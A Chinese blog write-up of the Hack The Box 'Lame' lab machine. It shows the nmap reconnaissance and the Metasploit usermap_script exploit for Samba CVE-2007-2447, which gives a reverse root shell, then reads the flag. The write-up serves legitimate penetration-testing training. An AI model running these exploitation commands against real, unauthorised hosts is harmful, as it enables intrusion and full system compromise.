HTB 实战 | Lame 靶机复盘

本文记录 Hack The Box 入门机器 Lame 的完整复盘过程,着重梳理思路与命令,还原「侦察 → 漏洞发现 → 利用 → 提权」的完整链路。

一、信息收集

先用 nmap 做全端口 + 服务版本探测:

1
nmap -sC -sV -T4 10.10.10.3

关键结果如下:

端口 服务 版本
21/tcp vsftpd 2.3.4
22/tcp OpenSSH 4.7p1
139/445/tcp Samba smbd 3.0.20

二、漏洞探测

  • vsftpd 2.3.4 存在知名后门,但该靶机的 21 端口是蜜罐,实际无法利用。
  • 真正可利用点是 Samba 3.0.20,对应漏洞 CVE-2007-2447(“用户名映射脚本”命令注入)。
1
smbclient -L //10.10.10.3/   # 匿名列出共享,验证 Samba 可达

三、漏洞利用

CVE-2007-2447 允许通过构造恶意用户名注入 shell 命令。使用 Metasploit:

1
2
3
4
5
msfconsole -q
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.x
run

拿到反弹 shell 后确认权限:

1
2
id      # uid=0(root) gid=0(root),该服务以 root 运行
cat /root/root.txt

四、复盘总结

  1. 版本探测是关键:老版本 Samba 的 usermap_script 属于 CVE-2007-2447,是典型的「已知漏洞直接打」。
  2. 不要被伪装漏洞带偏vsftpd 2.3.4 后门是干扰项,始终以「服务可达性 + 版本准确性」为判断依据。
  3. 记录与复现:每个靶机建议留存一份 nmap 输出与利用命令,方便日后整理成文。

HTB 实战 | Lame 靶机复盘
https://blog.ruil.top/2026/09/09/htb-lame-walkthrough/
作者
hadesec
发布于
2026年9月9日
许可协议